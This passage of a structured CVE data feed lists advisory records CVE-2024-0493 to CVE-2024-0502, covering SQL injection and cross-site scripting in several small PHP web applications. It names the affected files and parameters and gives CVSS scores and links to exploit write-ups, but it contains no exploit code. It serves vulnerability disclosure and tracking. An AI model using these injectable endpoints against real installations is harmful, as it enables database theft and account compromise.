"tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250597", "name" : "https://vuldb.com/?id.250597", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250597", "name" : "https://vuldb.com/?id.250597", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Kashipara Billing Software 1.0. Affected by this vulnerability is an unknown functionality of the file buyer_detail_submit.php of the component HTTP POST Request Handler. The manipulation of the argument gstn_no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250597 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:billing_software:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0493", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(5).docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(5).docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(5).docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(5).docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250598", "name" : "https://vuldb.com/?ctiid.250598", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250598", "name" : "https://vuldb.com/?ctiid.250598", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250598", "name" : "https://vuldb.com/?id.250598", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250598", "name" : "https://vuldb.com/?id.250598", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Kashipara Billing Software 1.0. Affected by this issue is some unknown functionality of the file submit_delivery_list.php of the component HTTP POST Request Handler. The manipulation of the argument customer_details leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250598 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:billing_software:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0494", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(3).docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(3).docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(3).docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(3).docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250599", "name" : "https://vuldb.com/?ctiid.250599", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250599", "name" : "https://vuldb.com/?ctiid.250599", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250599", "name" : "https://vuldb.com/?id.250599", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250599", "name" : "https://vuldb.com/?id.250599", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Kashipara Billing Software 1.0. This affects an unknown part of the file material_bill.php of the component HTTP POST Request Handler. The manipulation of the argument itemtypeid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250599." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:billing_software:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0495", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(2).docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(2).docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(2).docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(2).docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250600", "name" : "https://vuldb.com/?ctiid.250600", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250600", "name" : "https://vuldb.com/?ctiid.250600", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250600", "name" : "https://vuldb.com/?id.250600", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250600", "name" : "https://vuldb.com/?id.250600", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Kashipara Billing Software 1.0 and classified as critical. This vulnerability affects unknown code of the file party_submit.php of the component HTTP POST Request Handler. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250600." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:billing_software:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0496", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(1).docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(1).docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(1).docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(1).docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250601", "name" : "https://vuldb.com/?ctiid.250601", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250601", "name" : "https://vuldb.com/?ctiid.250601", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250601", "name" : "https://vuldb.com/?id.250601", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250601", "name" : "https://vuldb.com/?id.250601", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Billing Software 1.0 and classified as critical. This issue affects some unknown processing of the file item_list_edit.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250601 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:billing_software:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0497", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/SQL%20injection%20exists%20in%20student%20information%20system%20.docx", "name" : "https://github.com/laoquanshi/heishou/blob/main/SQL%20injection%20exists%20in%20student%20information%20system%20.docx", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/SQL%20injection%20exists%20in%20student%20information%20system%20.docx", "name" : "https://github.com/laoquanshi/heishou/blob/main/SQL%20injection%20exists%20in%20student%20information%20system%20.docx", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250602", "name" : "https://vuldb.com/?ctiid.250602", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250602", "name" : "https://vuldb.com/?ctiid.250602", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250602", "name" : "https://vuldb.com/?id.250602", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250602", "name" : "https://vuldb.com/?id.250602", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Campcodes Student Information System 1.0. It has been classified as critical. Affected is an unknown function of the file /classes/Users.php?f=save. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250602 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:campcodes:simple_student_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0498", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/lawyermanagementsystem.doc", "name" : "https://github.com/laoquanshi/heishou/blob/main/lawyermanagementsystem.doc", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/lawyermanagementsystem.doc", "name" : "https://github.com/laoquanshi/heishou/blob/main/lawyermanagementsystem.doc", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250603", "name" : "https://vuldb.com/?ctiid.250603", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250603", "name" : "https://vuldb.com/?ctiid.250603", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250603", "name" : "https://vuldb.com/?id.250603", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250603", "name" : "https://vuldb.com/?id.250603", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Project Worlds Lawyer Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file searchLawyer.php. The manipulation of the argument experience leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250603." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:yugeshverma:online_lawyer_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0499", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1DTGd_IWdS_tMOQN0Pt1-MeZ4Yv3tXiRt/view?usp=sharing", "name" : "https://drive.google.com/file/d/1DTGd_IWdS_tMOQN0Pt1-MeZ4Yv3tXiRt/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1DTGd_IWdS_tMOQN0Pt1-MeZ4Yv3tXiRt/view?usp=sharing", "name" : "https://drive.google.com/file/d/1DTGd_IWdS_tMOQN0Pt1-MeZ4Yv3tXiRt/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250607", "name" : "https://vuldb.com/?ctiid.250607", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250607", "name" : "https://vuldb.com/?ctiid.250607", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250607", "name" : "https://vuldb.com/?id.250607", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250607", "name" : "https://vuldb.com/?id.250607", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:house_rental_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-13T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0500", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1z30nTAfoX58NqwIMXyHb3LB6Pv2bEm5v/view?usp=sharing", "name" : "https://drive.google.com/file/d/1z30nTAfoX58NqwIMXyHb3LB6Pv2bEm5v/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1z30nTAfoX58NqwIMXyHb3LB6Pv2bEm5v/view?usp=sharing", "name" : "https://drive.google.com/file/d/1z30nTAfoX58NqwIMXyHb3LB6Pv2bEm5v/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250608", "name" : "https://vuldb.com/?ctiid.250608", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250608", "name" : "https://vuldb.com/?ctiid.250608", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250608", "name" : "https://vuldb.com/?id.250608", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250608", "name" : "https://vuldb.com/?id.250608", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in SourceCodester House Rental Management System 1.0. Affected is an unknown function of the component Manage Tenant Details. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250608." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:house_rental_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-13T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0501", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1xEenTDcXwNYdOxY8kdQ142nRnbcHrTRv/view?usp=sharing", "name" : "https://drive.google.com/file/d/1xEenTDcXwNYdOxY8kdQ142nRnbcHrTRv/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1xEenTDcXwNYdOxY8kdQ142nRnbcHrTRv/view?usp=sharing", "name" : "https://drive.google.com/file/d/1xEenTDcXwNYdOxY8kdQ142nRnbcHrTRv/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250609", "name" : "https://vuldb.com/?ctiid.250609", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250609", "name" : "https://vuldb.com/?ctiid.250609", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250609", "name" : "https://vuldb.com/?id.250609", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250609", "name" : "https://vuldb.com/?id.250609", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in SourceCodester House Rental Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Manage Invoice Details. The manipulation of the argument Invoice leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250609 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:house_rental_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-13T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0502", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1DGb371-evTgstf42t3u2dOM4KBEt5mPw/view?usp=sharing", "name" : "https://drive.google.com/file/d/1DGb371-evTgstf42t3u2dOM4KBEt5mPw/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1DGb371-evTgstf42t3u2dOM4KBEt5mPw/view?usp=sharing", "name" : "https://drive.google.com/file/d/1DGb371-evTgstf42t3u2dOM4KBEt5mPw/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250610", "name" : "https://vuldb.com/?ctiid.250610", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250610", "name" : "https://vuldb.com/?ctiid.250610", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250610", "name" : "https://vuldb.com/?id.250610", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250610", "name" : "https://vuldb.com/?id.250610", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester House Rental Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file manage_user.php of the component Edit User. The manipulation of the argument id/name/username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250610 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:house_rental_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0503", 